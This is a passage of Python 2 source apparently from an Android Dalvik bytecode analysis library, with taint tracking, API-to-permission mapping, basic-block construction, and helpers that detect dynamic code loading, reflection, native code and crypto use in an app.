self.API_PERMISSION_MAPPINGS_MODULE = load_api_specific_resource_module("api_permission_mappings", self.__vm.get_api_version())
# functions to get particulars elements
def get_string(self, s):
try:
return self.__vars[ TAINTED_STRING ][ s ]
except KeyError:
return None
def get_field(self, class_name, name, descriptor):
key = class_name + descriptor + name
try:
return self.__vars[ TAINTED_FIELD ] [ key ]
except KeyError:
return None
def toPathVariable(self, obj):
z = []
for i in obj.get_paths():
access, idx = i[0]
m_idx = i[1]
z.append( PathVar(access, idx, m_idx, obj ) )
return z
# permission functions
def get_permissions_method(self, method):
permissions = set()
for f, f1 in self.get_fields():
data = "%s-%s-%s" % (f.var[0], f.var[2], f.var[1])
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"].keys():
for path in f.get_paths():
#access, idx = path[0]
m_idx = path[1]
if m_idx == method.get_idx():
permissions.update(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"][data])
return permissions
def get_permissions(self, permissions_needed):
"""
@param permissions_needed : a list of restricted permissions to get ([] returns all permissions)
@rtype : a dictionnary of permissions' paths
"""
permissions = {}
pn = set(permissions_needed)
if permissions_needed == []:
pn = set(self.AOSP_PERMISSIONS_MODULE["AOSP_PERMISSIONS"].keys())
for f, _ in self.get_fields():
data = "%s-%s-%s" % (f.var[0], f.var[2], f.var[1])
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"].keys():
perm_intersection = pn.intersection(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_FIELDS"][data])
for p in perm_intersection:
try:
permissions[p].extend(self.toPathVariable(f))
except KeyError:
permissions[p] = []
permissions[p].extend(self.toPathVariable(f))
return permissions
# global functions
def get_strings(self):
for i in self.__vars[ TAINTED_STRING ]:
yield self.__vars[ TAINTED_STRING ][ i ], i
def get_fields(self):
for i in self.__vars[ TAINTED_FIELD ]:
yield self.__vars[ TAINTED_FIELD ][ i ], i
# specifics functions
def get_strings_by_method(self, method):
z = {}
try:
for i in self.__cache_string_by_method[ method.get_method_idx() ]:
z[ i ] = []
for j in i.get_paths():
if method.get_method_idx() == j[1]:
z[i].append( j[0] )
return z
except:
return z
def get_fields_by_method(self, method):
z = {}
try:
for i in self.__cache_field_by_method[ method.get_method_idx() ]:
z[ i ] = []
for j in i.get_paths():
if method.get_method_idx() == j[1]:
z[i].append( j[0] )
return z
except:
return z
def add(self, var, _type, _method=None):
if _type == TAINTED_FIELD:
key = var[0] + var[1] + var[2]
if key not in self.__vars[ TAINTED_FIELD ]:
self.__vars[ TAINTED_FIELD ][ key ] = TaintedVariable( var, _type )
elif _type == TAINTED_STRING:
if var not in self.__vars[ TAINTED_STRING ]:
self.__vars[ TAINTED_STRING ][ var ] = TaintedVariable( var, _type )
elif _type == TAINTED_LOCAL_VARIABLE:
if _method not in self.__vars[ TAINTED_LOCAL_VARIABLE ]:
self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ] = {}
if var not in self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ]:
self.__vars[ TAINTED_LOCAL_VARIABLE ][ _method ][ var ] = TaintedVariable( var, _type )
def push_info(self, _type, var, access, idx, ref):
if _type == TAINTED_FIELD:
self.add( var, _type )
key = var[0] + var[1] + var[2]
self.__vars[ _type ][ key ].push( access, idx, ref )
method_idx = ref.get_method_idx()
if method_idx not in self.__cache_field_by_method:
self.__cache_field_by_method[ method_idx ] = set()
self.__cache_field_by_method[ method_idx ].add( self.__vars[ TAINTED_FIELD ][ key ] )
elif _type == TAINTED_STRING:
self.add( var, _type )
self.__vars[ _type ][ var ].push( access, idx, ref )
method_idx = ref.get_method_idx()
if method_idx not in self.__cache_string_by_method:
self.__cache_string_by_method[ method_idx ] = set()
self.__cache_string_by_method[ method_idx ].add( self.__vars[ TAINTED_STRING ][ var ] )
TAINTED_PACKAGE_CREATE = 0
TAINTED_PACKAGE_CALL = 1
TAINTED_PACKAGE = {
TAINTED_PACKAGE_CREATE : "C",
TAINTED_PACKAGE_CALL : "M"
}
def show_Path(vm, path):
cm = vm.get_class_manager()
if isinstance(path, PathVar):
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
info_var = path.get_var_info()
print "%s %s (0x%x) ---> %s->%s%s" % (path.get_access_flag(),
info_var,
path.get_idx(),
dst_class_name,
dst_method_name,
dst_descriptor)
else:
if path.get_access_flag() == TAINTED_PACKAGE_CALL:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
print "%d %s->%s%s (0x%x) ---> %s->%s%s" % (path.get_access_flag(),
src_class_name,
src_method_name,
src_descriptor,
path.get_idx(),
dst_class_name,
dst_method_name,
dst_descriptor)
else:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
print "%d %s->%s%s (0x%x)" % (path.get_access_flag(),
src_class_name,
src_method_name,
src_descriptor,
path.get_idx())
def get_Path(vm, path):
x = {}
cm = vm.get_class_manager()
if isinstance(path, PathVar):
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
info_var = path.get_var_info()
x["src"] = "%s" % info_var
x["dst"] = "%s %s %s" % (dst_class_name, dst_method_name, dst_descriptor)
x["idx"] = path.get_idx()
else:
if path.get_access_flag() == TAINTED_PACKAGE_CALL:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
dst_class_name, dst_method_name, dst_descriptor = path.get_dst( cm )
x["src"] = "%s %s %s" % (src_class_name, src_method_name, src_descriptor)
x["dst"] = "%s %s %s" % (dst_class_name, dst_method_name, dst_descriptor)
else:
src_class_name, src_method_name, src_descriptor = path.get_src( cm )
x["src"] = "%s %s %s" % (src_class_name, src_method_name, src_descriptor)
x["idx"] = path.get_idx()
return x
def show_Paths(vm, paths):
"""
Show paths of packages
:param vm: the object which represents the dex file
:param paths: a list of :class:`PathP` objects
"""
for path in paths:
show_Path( vm, path )
def get_Paths(vm, paths):
"""
Return paths of packages
:param vm: the object which represents the dex file
:param paths: a list of :class:`PathP` objects
"""
full_paths = []
for path in paths:
full_paths.append(get_Path( vm, path ))
return full_paths
def show_PathVariable(vm, paths):
for path in paths:
access, idx = path[0]
m_idx = path[1]
method = vm.get_cm_method(m_idx)
print "%s %x %s->%s %s" % (access, idx, method[0], method[1], method[2][0] + method[2][1])
class PathP(object):
def __init__(self, access, idx, src_idx, dst_idx):
self.access_flag = access
self.idx = idx
self.src_idx = src_idx
self.dst_idx = dst_idx
def get_access_flag(self):
return self.access_flag
def get_dst(self, cm):
method = cm.get_method_ref(self.dst_idx)
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_src(self, cm):
method = cm.get_method_ref(self.src_idx)
return method.get_class_name(), method.get_name(), method.get_descriptor()
def get_idx(self):
return self.idx
def get_src_idx(self):
return self.src_idx
def get_dst_idx(self):
return self.dst_idx
class TaintedPackage(object):
def __init__(self, vm, name):
self.vm = vm
self.name = name
self.paths = {TAINTED_PACKAGE_CREATE : [], TAINTED_PACKAGE_CALL : []}
def get_name(self):
return self.name
def gets(self):
return self.paths
def push(self, access, idx, src_idx, dst_idx):
p = PathP( access, idx, src_idx, dst_idx )
self.paths[ access ].append( p )
return p
def get_objects_paths(self):
return self.paths[ TAINTED_PACKAGE_CREATE ]
def search_method(self, name, descriptor):
"""
@param name : a regexp for the name of the method
@param descriptor : a regexp for the descriptor of the method
@rtype : a list of called paths
"""
l = []
m_name = re.compile(name)
m_descriptor = re.compile(descriptor)
for path in self.paths[ TAINTED_PACKAGE_CALL ]:
_, dst_name, dst_descriptor = path.get_dst(self.vm.get_class_manager())
if m_name.match( dst_name ) != None and m_descriptor.match( dst_descriptor ) != None:
l.append( path )
return l
def get_method(self, name, descriptor):
l = []
for path in self.paths[ TAINTED_PACKAGE_CALL ]:
if path.get_name() == name and path.get_descriptor() == descriptor:
l.append( path )
return l
def get_paths(self):
for i in self.paths:
for j in self.paths[ i ]:
yield j
def get_paths_length(self):
x = 0
for i in self.paths:
x += len(self.paths[ i ])
return x
def get_methods(self):
return [path for path in self.paths[TAINTED_PACKAGE_CALL]]
def get_new(self):
return [path for path in self.paths[TAINTED_PACKAGE_CREATE]]
def show(self):
cm = self.vm.get_class_manager()
print self.get_name()
for _type in self.paths:
print "\t -->", _type
if _type == TAINTED_PACKAGE_CALL:
for path in self.paths[_type]:
print "\t\t => %s <-- %x in %s" % (path.get_dst(cm), path.get_idx(), path.get_src(cm))
else:
for path in self.paths[_type]:
print "\t\t => %x in %s" % (path.get_idx(), path.get_src(cm))
def show_Permissions(dx):
"""
Show where permissions are used in a specific application
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
p = dx.get_permissions( [] )
for i in p:
print i, ":"
for j in p[i]:
show_Path( dx.get_vm(), j )
def show_DynCode(dx):
"""
Show where dynamic code is used
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
paths = []
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/BaseDexClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/PathClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"<init>",
"."))
paths.extend(dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"loadDex",
"."))
show_Paths( dx.get_vm(), paths )
def show_NativeMethods(dx):
"""
Show the native methods
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
print get_NativeMethods(dx)
def show_ReflectionCode(dx):
"""
Show the reflection code
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
"""
paths = dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;", ".", ".")
show_Paths(dx.get_vm(), paths)
def get_NativeMethods(dx):
"""
Return the native methods
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: [tuple]
"""
d = dx.get_vm()
native_methods = []
for i in d.get_methods():
if i.get_access_flags() & 0x100:
native_methods.append(
(i.get_class_name(), i.get_name(), i.get_descriptor()))
return native_methods
def get_ReflectionCode(dx):
"""
Return the reflection code
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: [dict]
"""
paths = dx.get_tainted_packages().search_methods(
"Ljava/lang/reflect/Method;", ".", ".")
return get_Paths(dx.get_vm(), paths)
def is_crypto_code(dx):
"""
Crypto code is present ?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljavax/crypto/.",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/security/spec/.",
".",
"."):
return True
return False
def is_dyn_code(dx):
"""
Dalvik Dynamic code loading is present ?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ldalvik/system/BaseDexClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/PathClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexClassLoader;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"<init>",
"."):
return True
if dx.get_tainted_packages().search_methods("Ldalvik/system/DexFile;",
"loadDex",
"."):
return True
return False
def is_reflection_code(dx):
"""
Reflection is present ?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Method;",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/reflect/Field;",
".",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/Class;",
"forName",
"."):
return True
return False
def is_native_code(dx):
"""
Native code is present ?
:param dx : the analysis virtual machine
:type dx: a :class:`VMAnalysis` object
:rtype: boolean
"""
if dx.get_tainted_packages().search_methods("Ljava/lang/System;",
"load.",
"."):
return True
if dx.get_tainted_packages().search_methods("Ljava/lang/Runtime;",
"load.",
"."):
return True
return False
class TaintedPackages(object):
def __init__(self, _vm):
self.__vm = _vm
self.__packages = {}
self.__methods = {}
self.AOSP_PERMISSIONS_MODULE = load_api_specific_resource_module("aosp_permissions", self.__vm.get_api_version())
self.API_PERMISSION_MAPPINGS_MODULE = load_api_specific_resource_module("api_permission_mappings", self.__vm.get_api_version())
def _add_pkg(self, name):
if name not in self.__packages:
self.__packages[ name ] = TaintedPackage( self.__vm, name )
#self.context.get_tainted_packages().push_info( method_info[0], TAINTED_PACKAGE_CALL, idx, self, self.method, method_info[1], method_info[2][0] + method_info[2][1] )
def push_info(self, class_name, access, idx, method, idx_method):
self._add_pkg( class_name )
p = self.__packages[ class_name ].push( access, idx, method.get_method_idx(), idx_method )
try:
self.__methods[ method ][ class_name ].append( p )
except:
try:
self.__methods[ method ][ class_name ] = []
except:
self.__methods[ method ] = {}
self.__methods[ method ][ class_name ] = []
self.__methods[ method ][ class_name ].append( p )
def get_packages_by_method(self, method):
try:
return self.__methods[method]
except KeyError:
return {}
def get_package(self, name):
return self.__packages[name]
def get_packages_by_bb(self, bb):
"""
:rtype: return a list of packaged used in a basic block
"""
l = []
for i in self.__packages:
paths = self.__packages[i].gets()
for j in paths:
for k in paths[j]:
if k.get_bb() == bb:
l.append( (i, k.get_access_flag(), k.get_idx(), k.get_method()) )
return l
def get_packages(self):
for i in self.__packages:
yield self.__packages[i], i
def get_internal_packages_from_package(self, package):
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if src_class_name == package and dst_class_name in classes:
l.append(j)
return l
def get_internal_packages(self):
"""
:rtype: return a list of the internal packages called in the application
"""
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if dst_class_name in classes and m.get_name() in classes:
l.append(j)
return l
def get_internal_new_packages(self):
"""
:rtype: return a list of the internal packages created in the application
"""
classes = self.__vm.get_classes_names()
l = {}
for m, _ in self.get_packages():
paths = m.get_new()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
if src_class_name in classes and m.get_name() in classes:
if j.get_access_flag() == TAINTED_PACKAGE_CREATE:
try:
l[m.get_name()].append(j)
except:
l[m.get_name()] = []
l[m.get_name()].append(j)
return l
def get_external_packages(self):
"""
:rtype: return a list of the external packages called in the application
"""
classes = self.__vm.get_classes_names()
l = []
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, _, _ = j.get_src(self.__vm.get_class_manager())
dst_class_name, _, _ = j.get_dst(self.__vm.get_class_manager())
if src_class_name in classes and dst_class_name not in classes:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
l.append(j)
return l
def search_packages(self, package_name):
"""
:param package_name: a regexp for the name of the package
:rtype: a list of called packages' paths
"""
ex = re.compile(package_name)
l = []
for m, _ in self.get_packages():
if ex.search(m.get_name()) != None:
l.extend(m.get_methods())
return l
def search_unique_packages(self, package_name):
"""
:param package_name: a regexp for the name of the package
"""
ex = re.compile( package_name )
l = []
d = {}
for m, _ in self.get_packages():
if ex.match( m.get_info() ) != None:
for path in m.get_methods():
try:
d[ path.get_class_name() + path.get_name() + path.get_descriptor() ] += 1
except KeyError:
d[ path.get_class_name() + path.get_name() + path.get_descriptor() ] = 0
l.append( [ path.get_class_name(), path.get_name(), path.get_descriptor() ] )
return l, d
def search_methods(self, class_name, name, descriptor, re_expr=True):
"""
@param class_name : a regexp for the class name of the method (the package)
@param name : a regexp for the name of the method
@param descriptor : a regexp for the descriptor of the method
@rtype : a list of called methods' paths
"""
l = []
if re_expr == True:
ex = re.compile( class_name )
for m, _ in self.get_packages():
if ex.search( m.get_name() ) != None:
l.extend( m.search_method( name, descriptor ) )
return l
def search_objects(self, class_name):
"""
@param class_name : a regexp for the class name
@rtype : a list of created objects' paths
"""
ex = re.compile( class_name )
l = []
for m, _ in self.get_packages():
if ex.search( m.get_name() ) != None:
l.extend( m.get_objects_paths() )
return l
def search_crypto_packages(self):
"""
@rtype : a list of called crypto packages
"""
return self.search_packages( "Ljavax/crypto/" )
def search_telephony_packages(self):
"""
@rtype : a list of called telephony packages
"""
return self.search_packages( "Landroid/telephony/" )
def search_net_packages(self):
"""
@rtype : a list of called net packages
"""
return self.search_packages( "Landroid/net/" )
def get_method(self, class_name, name, descriptor):
try:
return self.__packages[ class_name ].get_method( name, descriptor )
except KeyError:
return []
def get_permissions_method(self, method):
permissions = set()
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
if j.get_method() == method:
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
dst_class_name, dst_method_name, dst_descriptor = j.get_dst( self.__vm.get_class_manager() )
data = "%s-%s-%s" % (dst_class_name, dst_method_name, dst_descriptor)
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"].keys():
permissions.update(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"][data])
return permissions
def get_permissions(self, permissions_needed):
"""
@param permissions_needed : a list of restricted permissions to get ([] returns all permissions)
@rtype : a dictionnary of permissions' paths
"""
permissions = {}
pn = set(permissions_needed)
if permissions_needed == []:
pn = set(self.AOSP_PERMISSIONS_MODULE["AOSP_PERMISSIONS"].keys())
classes = self.__vm.get_classes_names()
for m, _ in self.get_packages():
paths = m.get_methods()
for j in paths:
src_class_name, src_method_name, src_descriptor = j.get_src( self.__vm.get_class_manager() )
dst_class_name, dst_method_name, dst_descriptor = j.get_dst( self.__vm.get_class_manager() )
if (src_class_name in classes) and (dst_class_name not in classes):
if j.get_access_flag() == TAINTED_PACKAGE_CALL:
data = "%s-%s-%s" % (dst_class_name, dst_method_name, dst_descriptor)
if data in self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"].keys():
perm_intersection = pn.intersection(self.API_PERMISSION_MAPPINGS_MODULE["AOSP_PERMISSIONS_BY_METHODS"][data])
for p in perm_intersection:
try:
permissions[p].append(j)
except KeyError:
permissions[p] = []
permissions[p].append(j)
return permissions
class Enum(object):
def __init__(self, names):
self.names = names
for value, name in enumerate(self.names):
setattr(self, name.upper(), value)
def tuples(self):
return tuple(enumerate(self.names))
TAG_ANDROID = Enum([ 'ANDROID', 'TELEPHONY', 'SMS', 'SMSMESSAGE', 'ACCESSIBILITYSERVICE', 'ACCOUNTS',
'ANIMATION', 'APP', 'BLUETOOTH', 'CONTENT', 'DATABASE', 'DEBUG', 'DRM', 'GESTURE',
'GRAPHICS', 'HARDWARE', 'INPUTMETHODSERVICE', 'LOCATION', 'MEDIA', 'MTP',
'NET', 'NFC', 'OPENGL', 'OS', 'PREFERENCE', 'PROVIDER', 'RENDERSCRIPT',
'SAX', 'SECURITY', 'SERVICE', 'SPEECH', 'SUPPORT', 'TEST', 'TEXT', 'UTIL',
'VIEW', 'WEBKIT', 'WIDGET', 'DALVIK_BYTECODE', 'DALVIK_SYSTEM', 'JAVA_REFLECTION'])
TAG_REVERSE_ANDROID = dict((i[0], i[1]) for i in TAG_ANDROID.tuples())
TAGS_ANDROID = { TAG_ANDROID.ANDROID : [ 0, "Landroid" ],
TAG_ANDROID.TELEPHONY : [ 0, "Landroid/telephony"],
TAG_ANDROID.SMS : [ 0, "Landroid/telephony/SmsManager"],
TAG_ANDROID.SMSMESSAGE : [ 0, "Landroid/telephony/SmsMessage"],
TAG_ANDROID.DEBUG : [ 0, "Landroid/os/Debug"],
TAG_ANDROID.ACCESSIBILITYSERVICE : [ 0, "Landroid/accessibilityservice" ],
TAG_ANDROID.ACCOUNTS : [ 0, "Landroid/accounts" ],
TAG_ANDROID.ANIMATION : [ 0, "Landroid/animation" ],
TAG_ANDROID.APP : [ 0, "Landroid/app" ],
TAG_ANDROID.BLUETOOTH : [ 0, "Landroid/bluetooth" ],
TAG_ANDROID.CONTENT : [ 0, "Landroid/content" ],
TAG_ANDROID.DATABASE : [ 0, "Landroid/database" ],
TAG_ANDROID.DRM : [ 0, "Landroid/drm" ],
TAG_ANDROID.GESTURE : [ 0, "Landroid/gesture" ],
TAG_ANDROID.GRAPHICS : [ 0, "Landroid/graphics" ],
TAG_ANDROID.HARDWARE : [ 0, "Landroid/hardware" ],
TAG_ANDROID.INPUTMETHODSERVICE : [ 0, "Landroid/inputmethodservice" ],
TAG_ANDROID.LOCATION : [ 0, "Landroid/location" ],
TAG_ANDROID.MEDIA : [ 0, "Landroid/media" ],
TAG_ANDROID.MTP : [ 0, "Landroid/mtp" ],
TAG_ANDROID.NET : [ 0, "Landroid/net" ],
TAG_ANDROID.NFC : [ 0, "Landroid/nfc" ],
TAG_ANDROID.OPENGL : [ 0, "Landroid/opengl" ],
TAG_ANDROID.OS : [ 0, "Landroid/os" ],
TAG_ANDROID.PREFERENCE : [ 0, "Landroid/preference" ],
TAG_ANDROID.PROVIDER : [ 0, "Landroid/provider" ],
TAG_ANDROID.RENDERSCRIPT : [ 0, "Landroid/renderscript" ],
TAG_ANDROID.SAX : [ 0, "Landroid/sax" ],
TAG_ANDROID.SECURITY : [ 0, "Landroid/security" ],
TAG_ANDROID.SERVICE : [ 0, "Landroid/service" ],
TAG_ANDROID.SPEECH : [ 0, "Landroid/speech" ],
TAG_ANDROID.SUPPORT : [ 0, "Landroid/support" ],
TAG_ANDROID.TEST : [ 0, "Landroid/test" ],
TAG_ANDROID.TEXT : [ 0, "Landroid/text" ],
TAG_ANDROID.UTIL : [ 0, "Landroid/util" ],
TAG_ANDROID.VIEW : [ 0, "Landroid/view" ],
TAG_ANDROID.WEBKIT : [ 0, "Landroid/webkit" ],
TAG_ANDROID.WIDGET : [ 0, "Landroid/widget" ],
TAG_ANDROID.DALVIK_BYTECODE : [ 0, "Ldalvik/bytecode" ],
TAG_ANDROID.DALVIK_SYSTEM : [ 0, "Ldalvik/system" ],
TAG_ANDROID.JAVA_REFLECTION : [ 0, "Ljava/lang/reflect"],
}
class Tags(object):
"""
Handle specific tags
:param patterns:
:params reverse:
"""
def __init__(self, patterns=TAGS_ANDROID, reverse=TAG_REVERSE_ANDROID):
self.tags = set()
self.patterns = patterns
self.reverse = TAG_REVERSE_ANDROID
for i in self.patterns:
self.patterns[i][1] = re.compile(self.patterns[i][1])
def emit(self, method):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search( method.get_class() ) != None:
self.tags.add( i )
def emit_by_classname(self, classname):
for i in self.patterns:
if self.patterns[i][0] == 0:
if self.patterns[i][1].search( classname ) != None:
self.tags.add( i )
def get_list(self):
return [ self.reverse[ i ] for i in self.tags ]
def __contains__(self, key):
return key in self.tags
def __str__(self):
return str([ self.reverse[ i ] for i in self.tags ])
def empty(self):
return self.tags == set()
class BasicBlocks(object):
"""
This class represents all basic blocks of a method
"""
def __init__(self, _vm, tv):
self.__vm = _vm
self.tainted = tv
self.bb = []
def push(self, bb):
self.bb.append(bb)
def pop(self, idx):
return self.bb.pop(idx)
def get_basic_block(self, idx):
for i in self.bb:
if idx >= i.get_start() and idx < i.get_end():
return i
return None
def get_tainted_integers(self):
try:
return self.tainted.get_tainted_integers()
except:
return None
def get_tainted_packages(self):
try:
return self.tainted.get_tainted_packages()
except:
return None
def get_tainted_variables(self):
try:
return self.tainted.get_tainted_variables()
except:
return None
def get(self):
"""
:rtype: return each basic block (:class:`DVMBasicBlock` object)
"""
for i in self.bb:
yield i
def gets(self):
"""
:rtype: a list of basic blocks (:class:`DVMBasicBlock` objects)
"""
return self.bb
def get_basic_block_pos(self, idx):
return self.bb[idx]
class ExceptionAnalysis(object):
def __init__(self, exception, bb):
self.start = exception[0]
self.end = exception[1]
self.exceptions = exception[2:]
for i in self.exceptions:
i.append(bb.get_basic_block(i[1]))
def show_buff(self):
buff = "%x:%x\n" % (self.start, self.end)
for i in self.exceptions:
if i[2] == None:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2])
else:
buff += "\t(%s -> %x %s)\n" % (i[0], i[1], i[2].get_name())
return buff[:-1]
def get(self):
d = {"start": self.start, "end": self.end, "list": []}
for i in self.exceptions:
d["list"].append({"name": i[0], "idx": i[1], "bb": i[2].get_name()})
return d
class Exceptions(object):
def __init__(self, _vm):
self.__vm = _vm
self.exceptions = []
def add(self, exceptions, basic_blocks):
for i in exceptions:
self.exceptions.append( ExceptionAnalysis( i, basic_blocks ) )
def get_exception(self, addr_start, addr_end):
for i in self.exceptions:
# print hex(i.start), hex(i.end), hex(addr_start), hex(addr_end), i.start >= addr_start and i.end <= addr_end, addr_end <= i.end and addr_start >= i.start
if i.start >= addr_start and i.end <= addr_end:
return i
elif addr_end <= i.end and addr_start >= i.start:
return i
return None
def gets(self):
return self.exceptions
def get(self):
for i in self.exceptions:
yield i
BO = { "BasicOPCODES" : dvm.BRANCH_DVM_OPCODES, "BasicClass" : DVMBasicBlock, "Dnext" : dvm.determineNext, "Dexception" : dvm.determineException }
BO["BasicOPCODES_H"] = []
for i in BO["BasicOPCODES"]:
BO["BasicOPCODES_H"].append( re.compile( i ) )
class MethodAnalysis(object):
"""
This class analyses in details a method of a class/dex file
:param vm: the object which represent the dex file
:param method: the original method
:param tv: a virtual object to get access to tainted information
:type vm: a :class:`DalvikVMFormat` object
:type method: a :class:`EncodedMethod` object
"""
def __init__(self, vm, method, tv):
self.__vm = vm
self.method = method
self.tainted = tv
self.basic_blocks = BasicBlocks(self.__vm, self.tainted)
self.exceptions = Exceptions(self.__vm)
code = self.method.get_code()
if code == None:
return
current_basic = BO["BasicClass"](0, self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
##########################################################
bc = code.get_bc()
l = []
h = {}
idx = 0
debug("Parsing instructions")
instructions = [i for i in bc.get_instructions()]
for i in instructions:
for j in BO["BasicOPCODES_H"]:
if j.match(i.get_name()) != None:
v = BO["Dnext"](i, idx, self.method)
h[ idx ] = v
l.extend(v)
break
idx += i.get_length()
debug("Parsing exceptions")
excepts = BO["Dexception"]( self.__vm, self.method )
for i in excepts:
l.extend( [i[0]] )
for handler in i[2:]:
l.append( handler[1] )
debug("Creating basic blocks in %s" % self.method)
idx = 0
for i in instructions:
# index is a destination
if idx in l:
if current_basic.get_nb_instructions() != 0:
current_basic = BO["BasicClass"](current_basic.get_end(), self.__vm, self.method, self.basic_blocks)
self.basic_blocks.push(current_basic)
current_basic.push(i)
# index is a branch instruction
if idx in h:
current_basic = BO["BasicClass"]( current_basic.get_end(), self.__vm, self.method, self.basic_blocks )
self.basic_blocks.push( current_basic )
idx += i.get_length()
if current_basic.get_nb_instructions() == 0:
self.basic_blocks.pop(-1)
debug("Settings basic blocks childs")
for i in self.basic_blocks.get():
try:
i.set_childs( h[ i.end - i.get_last_length() ] )
except KeyError:
i.set_childs( [] )
debug("Creating exceptions")
# Create exceptions
self.exceptions.add(excepts, self.basic_blocks)
for i in self.basic_blocks.get():
# setup exception by basic block
i.set_exception_analysis(self.exceptions.get_exception( i.start, i.end - 1 ))
del instructions
del h, l
def get_basic_blocks(self):
"""
:rtype: a :class:`BasicBlocks` object
"""
return self.basic_blocks
def get_length(self):
"""
:rtype: an integer which is the length of the code
"""
return self.get_code().get_length()
def get_vm(self):
return self.__vm
def get_method(self):
return self.method
def get_local_variables(self):
return self.tainted.get_tainted_variables().get_local_variables( self.method )
def show(self):
print "METHOD", self.method.get_class_name(), self.method.get_name(), self.method.get_descriptor()
for i in self.basic_blocks.get():
print "\t", i
i.show()
print ""
def show_methods(self):
print "\t #METHODS :"
for i in self.__bb:
methods = i.get_methods()
for method in methods:
print "\t\t-->", method.get_class_name(), method.get_name(), method.get_descriptor()
for context in methods[method]:
print "\t\t\t |---|", context.details
def create_tags(self):
"""
Create the tags for the method
"""
self.tags = Tags()
for i in self.tainted.get_tainted_packages().get_packages_by_method( self.method ):
self.tags.emit_by_classname( i )
def get_tags(self):
"""
Return the tags of the method
:rtype: a :class:`Tags` object
"""
return self.tags
SIGNATURE_L0_0 = "L0_0"
SIGNATURE_L0_1 = "L0_1"
SIGNATURE_L0_2 = "L0_2"
SIGNATURE_L0_3 = "L0_3"
SIGNATURE_L0_4 = "L0_4"
SIGNATURE_L0_5 = "L0_5"
SIGNATURE_L0_6 = "L0_6"
SIGNATURE_L0_0_L1 = "L0_0:L1"
SIGNATURE_L0_1_L1 = "L0_1:L1"
SIGNATURE_L0_2_L1 = "L0_2:L1"
SIGNATURE_L0_3_L1 = "L0_3:L1"
SIGNATURE_L0_4_L1 = "L0_4:L1"
SIGNATURE_L0_5_L1 = "L0_5:L1"
SIGNATURE_L0_0_L2 = "L0_0:L2"
SIGNATURE_L0_0_L3 = "L0_0:L3"
SIGNATURE_HEX = "hex"
SIGNATURE_SEQUENCE_BB = "sequencebb"
SIGNATURES = {
SIGNATURE_L0_0 : { "type" : 0 },
SIGNATURE_L0_1 : { "type" : 1 },
SIGNATURE_L0_2 : { "type" : 2, "arguments" : ["Landroid"] },
SIGNATURE_L0_3 : { "type" : 2, "arguments" : ["Ljava"] },
SIGNATURE_L0_4 : { "type" : 2, "arguments" : ["Landroid", "Ljava"] },
SIGNATURE_L0_5 : { "type" : 3, "arguments" : ["Landroid"] },
SIGNATURE_L0_6 : { "type" : 3, "arguments" : ["Ljava"] },
SIGNATURE_SEQUENCE_BB : {},
SIGNATURE_HEX : {},
}
